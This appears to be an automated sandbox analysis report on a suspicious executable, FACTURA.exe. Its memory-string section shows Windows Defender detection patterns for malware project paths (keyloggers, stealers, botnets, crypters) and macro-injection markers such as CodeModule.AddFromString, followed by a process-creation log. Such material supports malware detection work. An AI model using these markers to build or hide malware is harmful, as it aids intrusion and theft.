Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	Binary or memory string: H\EOF\Alfredo\Downloader\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	Binary or memory string: .+:\\HELLS.*\\PrjMain.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: \sYs__Tem.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: .+:\\Users\\box1\\Downloads\\SoUnd-.+-2011\\[0-9]{3,16}\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	Binary or memory string: *\AC:\Documents and Settings\tjasi\Desktop\Downloader\Stub\p.vbpd"URLDownloadToFile
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: '".+Evoloution\\Server\\Server\.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: Scylla Botnet.+\\Server\\Proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\.*\\StuB\\Pro.vbp
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	Binary or memory string: \proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: .+\\mywisdom\\asian_scandal.+\\ngentot.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: \WebCounter\Source\WebCounter.vbp
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	Binary or memory string: *.sln.\|%WINDIR%\Explorer.exe
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	Binary or memory string: $Neagato_Hotela.vbp]
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	Binary or memory string: <iXato\PharOlniNe\Proyecto1.vbp]
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	Binary or memory string: ,'.+:\\SoUrCe.!\\.SOURC.*\\PrjMain.vbp
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	Binary or memory string: .+:\\Arcoir\\islo\\Color\\.+\\ColoresCo.*\\Arcoiriss.vbp
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: .)C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: J@*\AE:\RE9FA3~1\BUG_1_~1\XXXXXX~1.VBP
Source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp	Binary or memory string: .+Yakoza\\server\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: 6:\VB\own\ZB\ss\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: F:\prog lang\visual basic\edu\hack\key logger\EgySpy v1.11\server\EgySpy.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: A*\AC:\Documents and Settings\HailuYa.ETHAIR\Desktop\pass\asterie.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: LD:\Master\bb_soft\n_07_10_2008\dll.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: UPD:\\(BitComet\|BingDun\|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder\|ad)\.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: C:\\.A.\\B\\Base.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: \ffzefzefz.vbp
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	Binary or memory string: :5C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: LD:\Master\bb_soft\n_13_10_2008\dll.vbp
Source: MpSigStub.exe, 00000024.00000003.6327431635.00000197A37A2000.00000004.00000001.sdmp	Binary or memory string: sload.vbp
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	Binary or memory string: %.com\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: E@.+:\\Users\\box1\\Downloads\\SoUnd-.+-2011\\[0-9]{3,16}\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: :\PassStealer 3.0\Projekt1.vbp
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	Binary or memory string: \GetIPAddresListFromHost\ForRobot\IPv6Chat.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: RMC:\\Documents and Settings\\BUNNN\\My Documents\\vb\\Yahoo Spy.+Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	Binary or memory string: @.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: E:\\.+\\2010\\baidu.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: C:\winapp.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: 2\folder_x\File Folder.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: 4/.+:\\.+\\Stctr\\.+\\ZynExplore\\ZynExplore.vbp
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: \ardCo011064.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: \WinSysFix_1.5.vbp
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	Binary or memory string: \po\Cdmator.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: $\WEBPNT\weBpnt.VBp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: *z:\ultimate\casa.vbp]
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: .+:\\Obfuscated.*\\unapubvelr.vbp
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	Binary or memory string: \WebNav.vbp
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	Binary or memory string: Serega\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	Binary or memory string: B=.+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: A<C:\\WINDOWS\\system32\\config\\systemprofile\\.+\\Noway.vbp
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: PharOlniNe\Proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	Binary or memory string: F*\AE:\sharK\2.2\Server\Projekt1.vbpd[
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: PD:\Master\bb_soft\bb_loader\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	Binary or memory string: \Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	Binary or memory string: :\Users\jpvic\Desktop\VB6DLL\PROFULL_NODLL_SPLIT_AND_RES\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: z1.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Microsoft Visual Studio\VB98\pjtAwsVariantioner.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: vbSendMail.vbp
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	Binary or memory string: 0Desktop\war\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: vC:\Program Files\Microsoft Visual Studio\VB98\pjtbinder.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: Final RS Stealer\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: 1,.+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: SN.+\\(BotSupho Compiler\|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
Source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp	Binary or memory string: \Asterios\Heriposter.vbpxe
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: Dicionario.vbp
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	Binary or memory string: \ADWARA\prjX.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\box1\\Desktop\\7black2\\[a-zA-Z]{10,}.vbp
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	Binary or memory string: B=.+\\installscash nno form wow downloader\\mycc\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: `D:\Master\bb_soft\n_07_10_2008\bb_bho\VBBHO.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: .+\\Viruses\\Black Project\\Dark_Love.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: \\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: ao com erro\PrjMain.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: mt Download .vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: 0FileEZ HTTP\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: C:\\WINDOWS\\system32\\config\\systemprofile\\.+\\Noway.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: PE:\Coba Software\Virus\BRR\MOTTO_BRR.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: ,z:\abc\load\kombi.vbpxM
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	Binary or memory string: @\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: D:\\Main JOHN\\Recovered KILL\\.*Main Uploader\\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: D:\\(BitComet\|BingDun\|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder\|ad)\.vbp
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	Binary or memory string: 8Business\Kitty Logger\KL.vbp]
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	Binary or memory string: ..\Desktop\Startup\Bitar.vbpxN
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\fuckADX\\.+\\ADs.*\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: 4/.+\\Apr 14 2011 FileEZ HTTP\\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: :D:\Master\bb_soft\new\dll.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: F*\AD:\Junk Programs\Test_Passw20243252017\TestPwd\TestPwd.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: 2Crypt3r\demonio666vip.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	Binary or memory string: P\AYO.vbp
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	Binary or memory string: \Pack.vbp
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	Binary or memory string: C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	Binary or memory string: C:\Arquivos de programas\Microsoft Visual Studio\VB98\Projetos.frm\Flame Kill\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	Binary or memory string: papnsappsapusap5tap[yapmyapgabpagbptubp.vbp.wbpu.cpo_cprecpvicp
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	Binary or memory string: \KDWIN\KDWin.vbp
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents(1).CodeModule.deletelines
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp	Binary or memory string: \C:\ZKing8\WinZ\WSP\RenoNevada\FTPREM\MyFTP.vbp
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	Binary or memory string: Pinball.vbp
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	Binary or memory string: \WINDOWS.VBP]
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	Binary or memory string: &\SelectCaseEnum.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: .+\\Apr 14 2011 FileEZ HTTP\\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: ?:.+\\Abdallah\\.+\\iCrypt2.+\\stub_resources\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	Binary or memory string: .:\\Explorer\\Explorer.vbp
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	Binary or memory string: .vbpa)
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: \Virus\Romeo.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: DC:\Base de donnee\test\Projet1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: .+keylogger.+server\.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: -(.+\\mStubmmmm\\Backup.+\\lSUpRQlvPd.vbp
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	Binary or memory string: A*\AE:\My Programs\Trojans, PS,Hack , Crack\Molela\Molela 1.15 beta\Server\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: \\cryptor.+\\Project1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: Desktop\Russia\Error.vbp
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	Binary or memory string: \AYO.vbp
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	Binary or memory string: C:\Archivos de programa\Microsoft Visual Studio\VB98\Proyecto1.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: ^AJ:\MASTER\ad_compiler\moy.exe\balvanka\ZAG.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: :5.+\\Hell Packer.+\\gregstubs\\HEX\\HEX\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: 3..+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	Binary or memory string: .vbp
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	Binary or memory string: E@.+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: 3.\\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	Binary or memory string: 2*\AC:\y0Za8\wpad\wpad.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: BD:\Master\bb_soft\not_est\dll.vbp
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	Binary or memory string: *\AC:\Users\Administrator\Desktop\VB2\osama.vbpx
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: GBD:\\Main JOHN\\Recovered KILL\\.*Main Uploader\\ServiceSample.vbp
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp	Binary or memory string: cMicroLab.vbp
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	Binary or memory string: C>:\\.+\\Bkoli Hazm\\Lostdoor.+\\Client.+\\Helminth_Project.vbp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	Binary or memory string: TroyanExplore\Instalar.vbp
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	Binary or memory string: D:\\Apple\\VB.google\\.\.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: VQ.+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	Binary or memory string: 8my programs\I_R\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	Binary or memory string: nh AV\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: .+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: \gugu.vbp]
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	Binary or memory string: % .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp	Binary or memory string: HKnamemom.vbpa
Source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp	Binary or memory string: \Simplesso.vbp
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp	Binary or memory string: -powerword\PowerWord.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: <\ALLROUND STEALER\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: 4/.+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	Binary or memory string: \Bonus 1.5.vbp
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: 6@*\AC:\server\Tarantula.vbp
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	Binary or memory string: hider\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	Binary or memory string: ysp\ysp.vbp
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: C:\\Documents and Settings\\Administrador\\Mis documentos\\Trabajo Empresarial de Luis\\.*.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: :Black Dream\Server\Server.vbp]
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: d_C:\\Documents and Settings\\Administrador\\Mis documentos\\Trabajo Empresarial de Luis\\.*.vbp
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	Binary or memory string: 8\MicroProCon\FileConfig.vbp
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: \|C:\Documents and Settings\Diego\Desktop\gold hack\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	Binary or memory string: ..\Desktop\Startup\Bitar.vbp
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	Binary or memory string: .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	Binary or memory string: fzx9823.vbp
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	Binary or memory string: 1.VBProject.VBComponents(1).CodeModule.insertlines
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	Binary or memory string: A*\AC:\Users\Joke_codder\Desktop\RSRS\fvgbhncfvgbhnjm.vbpx
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: .+\\Virus Maker\\s1\\Project1.vbp
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	Binary or memory string: 72C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	Binary or memory string: C:\\.+\\www.microfost.com -3.vbp
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	Binary or memory string: .+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	Binary or memory string: `@*\AC:\PiElcestial-udtools-net-indetectables.vbp

Source: C:\Users\user\Desktop\FACTURA.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\FACTURA.exe 'C:\Users\user\Desktop\FACTURA.exe'
Source: C:\Users\user\Desktop\FACTURA.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 848
Source: C:\Users\user\Desktop\FACTURA.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 856
Source: unknown	Process created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
Source: unknown	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-5e107659.exe' /q WD
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.16.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-5e107659.exe /q WD
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\3A24BB4C-F6EB-A1AC-C6CC-E780FED56A57.man
Source: C:\Windows\System32\wevtutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\3A24BB4C-F6EB-A1AC-C6CC-E780FED56A57.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Source: C:\Windows\System32\wevtutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-fad3e9a8.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.16.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-5e107659.exe /q WD
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe	Process created: unknown unknown

Source: C:\Windows\System32\oobe\UserOOBEBroker.exe

